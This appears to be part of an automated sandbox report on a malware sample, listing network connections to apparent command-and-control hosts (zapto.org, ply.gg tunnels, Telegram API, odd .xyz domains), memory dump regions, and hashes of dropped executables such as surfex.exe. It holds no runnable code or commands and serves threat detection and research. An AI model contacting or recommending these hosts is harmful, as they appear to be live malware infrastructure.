BG 195.230.23.72:80 tcp
US 20.83.148.22:80 tcp
US 26.185.184.104:942 tcp
FR 172.217.20.164:443 www.google.com tcp
US 8.8.8.8:53 grupodulcemar.pe udp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
DE 185.218.125.157:21441 tcp
PE 161.132.57.101:80 grupodulcemar.pe tcp
DE 185.218.125.157:21441 tcp
FR 172.217.20.206:443 clients2.google.com tcp
FR 172.217.20.206:443 clients2.google.com tcp
RU 185.215.113.43:80 185.215.113.43 tcp
DE 185.218.125.157:21441 tcp
IR 217.171.148.45:40500 udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 45.148.171.217.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
BG 195.230.23.72:80 tcp
DE 193.161.193.99:25170 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 login-donor.gl.at.ply.gg udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
KR 45.154.14.21:7777 45.154.14.21 tcp
DE 209.38.221.184:8080 209.38.221.184 tcp
KZ 95.58.91.70:40500 udp
DE 46.235.26.83:8080 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 70.91.58.95.in-addr.arpa udp
US 8.8.8.8:53 21.14.154.45.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.164.120:40500 udp
US 8.8.8.8:53 120.164.156.90.in-addr.arpa udp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 31.41.244.11:80 31.41.244.11 tcp
FR 172.217.20.164:443 www.google.com tcp
DE 147.28.185.29:80 147.28.185.29 tcp
BG 195.230.23.72:80 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
NL 38.180.123.95:3232 tcp
NL 206.166.251.4:8080 tcp
DE 185.218.125.157:21441 tcp
EG 62.114.143.56:40500 tcp
DE 94.156.177.33:80 94.156.177.33 tcp
US 8.8.8.8:53 29.185.28.147.in-addr.arpa udp
DE 193.161.193.99:25170 tcp
US 26.185.184.104:942 tcp
DE 185.218.125.157:21441 tcp
KZ 37.99.52.150:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 150.52.99.37.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
UZ 90.156.162.106:40500 udp
RU 185.215.113.43:80 185.215.113.43 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
NL 89.110.69.103:80 tcp
FR 172.217.20.164:443 www.google.com tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 106.162.156.90.in-addr.arpa udp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
US 20.83.148.22:80 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
FR 51.159.4.50:8080 51.159.4.50 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 50.4.159.51.in-addr.arpa udp
DE 193.161.193.99:25170 tcp
US 20.83.148.22:80 tcp
NL 89.110.69.103:80 tcp
RU 45.150.24.42:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 42.24.150.45.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
NL 178.132.2.10:4000 tcp
KZ 95.59.162.2:40500 udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 142.250.187.195:443 beacons.gcp.gvt2.com tcp
GB 142.250.187.195:443 beacons.gcp.gvt2.com tcp
GB 142.250.187.195:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
DE 167.235.70.96:8080 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
RU 185.215.113.67:21405 tcp
FR 172.217.20.164:443 www.google.com tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
YE 94.26.196.74:40500 udp
SY 82.137.244.65:40500 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 74.196.26.94.in-addr.arpa udp
DE 193.161.193.99:25170 tcp
US 26.185.184.104:942 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
IR 2.176.119.113:40500 udp
US 8.8.8.8:53 113.119.176.2.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
BG 195.230.23.72:80 tcp
YE 78.137.64.239:40500 udp
US 8.8.8.8:53 239.64.137.78.in-addr.arpa udp
BG 195.230.23.72:80 tcp
DE 194.164.198.113:8080 tcp
FR 172.217.20.164:443 www.google.com tcp
US 8.8.8.8:53 camp.zapto.org udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
US 8.8.8.8:53 educational-reform.gl.at.ply.gg udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
SY 95.212.120.220:40500 udp
US 8.8.8.8:53 220.120.212.95.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
GB 132.145.17.167:9090 132.145.17.167 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
US 20.83.148.22:80 tcp
BG 195.230.23.72:80 tcp
UZ 93.188.86.253:40500 udp
US 8.8.8.8:53 167.17.145.132.in-addr.arpa udp
US 8.8.8.8:53 253.86.188.93.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
US 8.8.8.8:53 api.telegram.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
RU 185.215.113.67:21405 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq udp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 sanboxland.pro udp
GB 89.35.131.209:80 sanboxland.pro tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DZ 41.102.19.3:40500 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
GB 89.35.131.209:80 sanboxland.pro tcp
US 26.185.184.104:942 tcp
DE 193.161.193.99:25170 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
NL 149.154.167.220:443 api.telegram.org tcp
YE 178.130.96.97:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 97.96.130.178.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
BA 77.221.20.139:40500 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 139.20.221.77.in-addr.arpa udp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
FR 172.217.20.164:443 www.google.com tcp
DE 185.218.125.157:21441 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
DE 193.161.193.99:25170 tcp
IR 2.176.90.19:40500 udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 19.90.176.2.in-addr.arpa udp
DE 41.216.183.9:8080 tcp
DE 209.38.221.184:8080 209.38.221.184 tcp
DE 46.235.26.83:8080 tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
RU 185.215.113.67:21405 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
KZ 88.151.180.214:40500 udp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 214.180.151.88.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
IR 94.183.35.46:40500 tcp
US 20.83.148.22:80 tcp
N/A 127.0.0.1:8777 tcp
IR 2.176.109.189:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 189.109.176.2.in-addr.arpa udp
DE 147.28.185.29:80 147.28.185.29 tcp
NL 206.166.251.4:8080 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
IR 2.190.67.184:40500 udp
US 8.8.8.8:53 184.67.190.2.in-addr.arpa udp
US 26.185.184.104:942 tcp
DE 193.161.193.99:25170 tcp
BG 195.230.23.72:80 tcp
US 20.83.148.22:80 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
FR 51.159.4.50:8080 51.159.4.50 tcp
DE 185.218.125.157:21441 tcp
NL 149.154.167.220:443 api.telegram.org tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
UZ 195.158.22.4:40500 udp
US 8.8.8.8:53 4.22.158.195.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
UZ 217.30.162.37:40500 udp
US 8.8.8.8:53 claywyaeropumps.com udp
RU 185.215.113.67:21405 tcp
N/A 127.0.0.1:8777 tcp
US 8.8.8.8:53 37.162.30.217.in-addr.arpa udp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.160.86:40500 tcp
N/A 127.0.0.1:9222 tcp
MX 189.191.143.93:40500 udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
US 8.8.8.8:53 93.143.191.189.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
IR 2.176.92.74:40500 udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 74.92.176.2.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 26.185.184.104:942 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
DE 41.216.183.9:8080 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
N/A 127.0.0.1:8777 tcp
SY 82.137.218.134:40500 udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
US 8.8.8.8:53 134.218.137.82.in-addr.arpa udp
DE 209.38.221.184:8080 209.38.221.184 tcp
DE 46.235.26.83:8080 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
MX 189.167.44.219:40500 udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 219.44.167.189.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
IR 5.238.93.200:40500 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 200.93.238.5.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 198.163.204.6:40500 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 peerhost59mj7i6macla65r.com udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
US 26.185.184.104:942 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 37.78.33.95:40500 udp
US 8.8.8.8:53 95.33.78.37.in-addr.arpa udp
NL 38.180.123.95:3232 tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
IR 5.219.44.252:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 252.44.219.5.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
RU 185.215.113.67:21405 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 193.161.193.99:25170 tcp
N/A 172.16.16.140:40500 udp
US 8.8.8.8:53 140.16.16.172.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
UZ 87.237.234.195:40500 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
NL 178.132.2.10:4000 tcp
DE 193.161.193.99:25170 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
IR 151.243.58.90:40500 udp
US 8.8.8.8:53 90.58.243.151.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.161.82:40500 udp
US 8.8.8.8:53 82.161.156.90.in-addr.arpa udp
DE 193.161.193.99:25170 tcp
US 26.185.184.104:942 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.160.56:40500 udp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
US 8.8.8.8:53 56.160.156.90.in-addr.arpa udp
IR 188.212.88.213:40500 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
PK 124.109.48.132:40500 udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 132.48.109.124.in-addr.arpa udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 26.185.184.104:942 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
KZ 95.58.216.162:40500 udp
US 8.8.8.8:53 162.216.58.95.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
MX 187.235.157.13:40500 udp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 13.157.235.187.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
IR 217.171.148.45:40500 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
IR 2.179.60.101:40500 udp
US 8.8.8.8:53 101.60.179.2.in-addr.arpa udp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
RU 78.37.229.249:40500 udp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 249.229.37.78.in-addr.arpa udp
DE 193.161.193.99:25170 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
NL 38.180.123.95:3232 tcp
KZ 89.218.186.86:40500 udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 86.186.218.89.in-addr.arpa udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 193.161.193.99:25170 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
US 26.185.184.104:942 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
KZ 95.59.165.102:40500 udp
US 8.8.8.8:53 102.165.59.95.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:9222 tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
KZ 92.46.228.246:40500 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 178.206.158.183:40500 udp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
US 8.8.8.8:53 183.158.206.178.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 claywyaeropumps.com udp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
TJ 109.74.69.43:40500 udp
US 26.185.184.104:942 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 43.69.74.109.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
TR 91.93.138.14:40500 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 14.138.93.91.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
SY 188.160.12.49:40500 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
IR 2.179.117.33:40500 udp
US 8.8.8.8:53 33.117.179.2.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 26.185.184.104:942 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
KZ 37.150.154.178:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 178.154.150.37.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 193.161.193.99:25170 tcp
RU 185.215.113.67:21405 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.160.12:40500 udp
US 8.8.8.8:53 12.160.156.90.in-addr.arpa udp
UZ 213.230.108.92:40500 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
YE 134.35.126.112:40500 udp
US 8.8.8.8:53 112.126.35.134.in-addr.arpa udp
US 8.8.8.8:53 camp.zapto.org udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 login-donor.gl.at.ply.gg udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
N/A 127.0.0.1:8777 tcp
NL 178.132.2.10:4000 tcp
IR 37.254.96.229:40500 udp
N/A 127.0.0.1:8777 tcp
SY 82.137.244.65:40500 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 229.96.254.37.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 26.185.184.104:942 tcp
DE 193.161.193.99:25170 tcp

Files

memory/4504-4-0x00007FFCC5D73000-0x00007FFCC5D75000-memory.dmp

memory/4504-5-0x0000000000750000-0x0000000000758000-memory.dmp

memory/4504-6-0x00007FFCC5D70000-0x00007FFCC6831000-memory.dmp

memory/4288-7-0x0000000000AC0000-0x0000000000AC8000-memory.dmp

memory/4288-8-0x0000000005470000-0x000000000550C000-memory.dmp

C:\Users\Admin\Desktop\Files\surfex.exe

MD5 1f4b0637137572a1fb34aaa033149506
SHA1 c209c9a60a752bc7980a3d9d53daf4b4b32973a9
SHA256 60c645c0a668c13ad36d2d5b67777dedf992e392e652e7f0519f21d658254648
SHA512 4fd27293437b8bf77d15d993da2b0e75c9fba93bd5f94dad439a3e2e4c16c444f6a32543271f1d2ad79c220354b23301e544765ca392fc156267a89338452e86

memory/2536-20-0x0000000000560000-0x00000000005B4000-memory.dmp

memory/1772-22-0x0000000000400000-0x0000000000450000-memory.dmp

memory/1772-24-0x0000000005800000-0x0000000005DA4000-memory.dmp

memory/1772-25-0x00000000052F0000-0x0000000005382000-memory.dmp

memory/1772-26-0x0000000005270000-0x000000000527A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tmp500F.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

memory/1772-43-0x0000000005FB0000-0x0000000006026000-memory.dmp

memory/1772-44-0x0000000006750000-0x000000000676E000-memory.dmp

memory/1772-47-0x0000000006D90000-0x00000000073A8000-memory.dmp

memory/1772-48-0x00000000068E0000-0x00000000069EA000-memory.dmp

memory/1772-49-0x0000000006820000-0x0000000006832000-memory.dmp

memory/1772-50-0x0000000006880000-0x00000000068BC000-memory.dmp

memory/1772-51-0x00000000069F0000-0x0000000006A3C000-memory.dmp

memory/4504-52-0x00007FFCC5D73000-0x00007FFCC5D75000-memory.dmp

memory/4504-53-0x00007FFCC5D70000-0x00007FFCC6831000-memory.dmp

C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe

MD5 3a425626cbd40345f5b8dddd6b2b9efa
SHA1 7b50e108e293e54c15dce816552356f424eea97a
SHA256 ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1
SHA512 a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668

C:\Users\Admin\Desktop\New Text Document mod.exse\a\u1w30Wt.exe

MD5 e3eb0a1df437f3f97a64aca5952c8ea0
SHA1 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a
SHA256 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521
SHA512 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf

